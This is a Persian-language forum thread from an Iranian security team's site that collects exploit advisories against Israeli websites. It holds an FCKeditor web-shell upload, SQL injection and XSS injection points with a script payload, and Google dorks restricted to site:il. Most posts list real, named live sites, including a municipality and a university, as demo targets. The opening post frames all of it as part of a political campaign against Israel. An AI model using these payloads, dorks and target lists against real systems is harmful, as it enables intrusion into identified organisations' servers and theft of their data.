رفتن به مطلب

ارسال های توصیه شده

51139289453949924826.jpg

 

 

سلام خدمت عزیزان گارد ایران.خوب دوستان,من در این تاپییک قصد دارم که به همراه شما باگهای سایت های اسراییلی رو بررسی کنم.

امیدوارم از آموزش ها نهایت و بهره و ببرین.

به امید روزی که صهیونیست و استکبار و ظالم از صفحه روزگار محو شوند.

 

یا حق

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

نکته:برخی از باگها توسط گروه های امنیتی دیگر کشف شده اند ولی به دلیل اهمیتی که دارند من قرار میدم.

 

Wordocs Israel FCKeditor Shell Upload

---------------------------------------------------------------- 
Wordocs Israel FCKeditor Shell Upload Disclosure Vulnerabilities 
---------------------------------------------------------------- 
  
# Exploit Title: Wordocs Israel FCKeditor Shell Upload Disclosure 
Vulnerabilities 
# Google Dork: inurl:/files/wordocs/ site:il 
# Application Name: [Wordocs Israel] 
# Date: 2012-09-04 
# Author: BHG Security Center 
# Home: http://cc.black-hg.org - http://greyh4t.com/cc/ 
# Version: [ 0.4.1.16 ] 
# Impact : [ High ] 
# Tested on: [linux+apache] 
# CVE : Webapps 
# Finder(s): 
    - Net.Edit0r (Net.Edit0r [at] att [dot] net) 
  
# Note: Please note there is a vulnerability in the site of 
non-Israeli 
# Description: : You can directly upload your shellcode and use server 
  
+-----------------------+ 
| Shellcode Upload      | 
+-----------------------+ 
  
The vulnerable code is located in 
/FCKeditor/editor/plugins/uploadme/fck_uploadme.php 
  
Proof of Concept: 
----------------- 
  
~ PoC : http://localhost/FCKeditor/editor/plugins/uploadme/fck_uploadme.php 
  
  
  ~ File upload path : http://[Target]/files/wordocs/shell.php 
  
~~~~~~~~ Demo : 
http://facet-theory.org/FCKeditor/editor/plugins/uploadme/fck_uploadme.php 
  
~ Study of Vulnerability : http://www.mediafire.com/?qedv4dq6b4yfqcz 
  
  
[-] Disclosure timeline: 
  
[04/08/2011] - Vulnerabilities discovered 
[14/10/2011] - Others vulnerabilities discovered 
[15/10/2011] - Issues reported to http://black-hg.org 
[04/09/2012] - Public disclosure 
  
  
# Greets To : 
  
Net.Edit0r ~ A.Cr0x ~ 3H34N ~ G3n3Rall ~ l4tr0d3ctism ~ NoL1m1t 
  
~ Mr.XHat  THANKS TO ALL Iranian HackerZ  ./Persian Gulf 
  
===========================================[End]=============================================  
لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

Binamic Web Design Israel SQL Injection

# Exploit Title: Binamic Web Design Israel SQL Injection Vulnerability 
# Date: 28/09/2011 - 20:38 
# Author: 3spi0n 
# Software Link: http://www.binamica.co.il/ 
# Tested On: BackTrack 5 - Win7 Ultimate 
# Platform: Php 
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 
  
[$] Dorks: "intext:"Developed by Binamica"" 
  
[$] Demo Sites: 
  
[~] http://www.givot.co.il/english/article.php?id=114" [PhpSQLi] 
[~] http://www.hebron.com/english/article.php?id=725" [PhpSQLi] 
  
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 
# We attempted to work, you can not imagine. 
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 
# Contact: Http://3spi0n.Net/ 
# Greetz: Http://DarkDevilz.in/ 
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 
Mr.PaPaRoSSe  Black_Umo  ALEXTRAX  Brs_BaRoN  ZyX  x-Leader 
L4NETLY  DARKCOD3R  Santiq0  53rh4t  PerS 
  
[And DD'z Family] 
  
[DarkDevilz - Defence And Destruction Group'z - TURKEY] 
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 
 
لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

Priza Israel CMS 0.0.2 Cross Site Scripting / SQL Injection

# Exploit Title: Priza Israel Cms SQL Injection / XSS Multiple Vulnerability 
# Date: 2012-01-05 [GMT +7] 
# Author: BHG Security Center 
# Software Link: http://www.priza.co.il/ 
# Vendor Response(s): They didn't respond to the emails. 
# Dork: intext:"Powered by Priza" 
# Version : [0.0.2] 
# Tested on: ubuntu 11.04 
# CVE : - 
# Finder(s): 
    - Net.Edit0r (Net.edit0r [at] att [dot] net) 
  - G3n3Rall (Ant1_s3cur1ty [at] yahoo [dot] com) 
  
----------------------------------------------------------------------------------------- 
Priza Israel Cms SQL Injection / XSS Multiple Vulnerability 
----------------------------------------------------------------------------------------- 
  
Author : BHG Security Center 
Date : 2012-01-05 
Location : Iran 
Web : http://Black-Hg.Org 
Critical Lvl : Medium 
Where : From Remote 
My Group : Black Hat Group #BHG 
--------------------------------------------------------------------------- 
  
PoC/Exploit: 
~~~~~~~~~~ 
  
~ [PoC] ~: /website_path/index.asp?p_id=201&id=[SQLi] 
  
~ [PoC] ~: /website_path/index.asp?page_id=[SQLi] 
  
~ [PoC] ~: /website_path/volumes.asp?id=18 
  
~ [PoC] ~: /website_path/index.asp?action=find&page_id=28&string=[Xss] 
  
~~~~~~~~ Exploit 
  
~ [PoC] ~: Http://[victim]/path/index.asp?p_id=201&id=[SQLi] 
  
~ [PoC] ~: Http://[victim]/path/index.asp?action=find&page_id=28&string="><script>alert(0)</script> 
  
  
Demo URL: 
~~~~~~~~~ 
  
~~~~~~~ SQL Injection Demo 
  
- http://www.dinablich.co.il/website_en/index.asp?p_id=201&id=24' 
  
- http://www.jerusalem-crown.co.il/website_en/index.asp?page_id=7' 
  
- http://partialanswers.huji.ac.il/volumes.asp?id=18' 
  
~~~~~~~ XSS Demo 
  
- http://www.telad-mobile.com/website/index.asp?action=find&page_id=28&string="><script>alert(0)</script> 
  
 Timeline: 
~~~~~~~~~ 
- 02 - 01 - 2012 bug found. 
- 03 - 01 - 2012 vendor contacted, but no response. 
- 05 - 01 - 2012 Advisories release. 
  
 Important Notes: 
~~~~~~~~~ 
  
- Vendor did not respond to the email as well as the phone. As there 
is not any contact form or email address in 
  
- the website, we have used all the emails which had been found by 
searching in Google such as support, info, and so on. 
  
--------------------------------------------------------------------------- 
Greetz To:A.Cr0x | 3H34N | tHe.k!ll3r | Mr.XHat |NoL1m1t |Bl4ck.Viper 
  
Spical Th4nks: B3hz4d | ArYaIeIrAN| _SENATOR_ |Cyber C0der And All My Friendz 
  
[!] Persian Gulf 4 Ever 
[!] I Love Iran And All Iranian People 
Greetz To : 1337day.com ~ exploit-db.com [h4ckcity tM] And All Iranian HackerZ 
-------------------------------- [ EOF ] ---------------------------------- 
لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

 

Telerom CMS SQLi Vulnerability

 



Telerom CMS SQLi Vulnerability

Software : Telerom
Date : 2/17/2012
Vendor : http://www.telerom.co.il
Language : ASP
Dork : "Powered By Telerom"
Author : ITTIHACK
Home : http://ittihack.com


Vulnerable File: index.asp

Exploit:
http://target/index.asp?id=[SQLi]

Demo :
http://telerom.co.il/index.asp?id=1' <-- Software Developer
http://ramla.muni.il/index.asp?id=1
http://sgocr.org.il/index.asp?id=1'
http://zy1882.co.il/index.asp?id=1'
http://morimonopol.org.il/index.asp?id=1'
http://provigil.co.il/index.asp?id=1'
http://mmnetanya.co.il/index.asp?id=1'


May allah have mercy on the martyrs of Syria

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

(Binamic Web Design Israel ( XSS

# Exploit Title: Binamic Web Design Israel ( XSS) 
# Author: Ayastar 
# Software Link: http://www.binamica.co.il/ 
# Category : [ webapps ] 
# Google dork: intext:"Developed by Binamica" 
# 
# 
#[eXPLOIT] 
#HTTP://localhost/path/article.php?operation=print&id=[XSS] 
#HTTP://localhost/path/articles.php?type=[XSS] 
# 
# 
#E-mail : Dmx-ayastar@hotmail.fr 
#From morocco 
لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

این هم تعدادی دورک جدید از سایت های اسراییلی

 intext:"error in your SQL syntax" +site:il 
    intext:"mysql_num_rows()" +site:il 
    intext:"mysql_fetch_array()" +site:il 
    intext:"Error Occurred While Processing Request" +site:il 
    intext:"Server Error in '/' Application" +site:il 
    intext:"Microsoft OLE DB Provider for ODBC Drivers error" +site:il 
    intext:"Invalid Querystring" +site:il 
    intext:"OLE DB Provider for ODBC" +site:il 
    intext:"VBScript Runtime" +site:il 
    intext:"ADODB.Field" +site:il 
    intext:"BOF or EOF" +site:il 
    intext:"ADODB.Command" +site:il 
    intext:"JET Database" +site:il 
    intext:"mysql_fetch_row()" +site:il 
    intext:"Syntax error" +site:il 
    intext:"include()" +site:il   
    intext:"mysql_fetch_assoc()" +site:il 
    intext:"mysql_fetch_object()" +site:il 
    intext:"mysql_numrows()" +site:il 
    intext:"GetArray()" +site:il 
    intext:"FetchRow()" +site:il 
    intext:"Input string was not in a correct format" +site:il  

منبع دورکها:irist.ir

 

به امید پیروزی انقلاب اسلامی.

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری
 اشتراک گذاری

انجمن تیم امنیتی گارد ایران

تیم امنیتی گارد ایران یک گروه مستقل است که قوانین آن با خط مشی جمهوری اسلامی ایران مغایرت ندارد. تیم امنیتی گارد ایران از سال 1393 فعالیت خود را آغاز کرد و هدف این تیم تامین امنیت سایت ها و سرورهای ایرانی است. تیم ما همیشه برای دفاع از مرزهای سایبری سرزمین عزیزمان ایران آماده است.

شرکت گاردایران

پردازشگران ایمن داده ي آدلان

شماره ثبت: 9438

شبکه های اجتماعی

 

نمادها

logo.aspx?id=56084&Code=ybjZVyBlXag5cNRv logo-samandehi

×
×
  • اضافه کردن...

اطلاعات مهم

فعالیت شما در این انجمن به منزله تایید قوانین انجمن میباشد! شرایط استفاده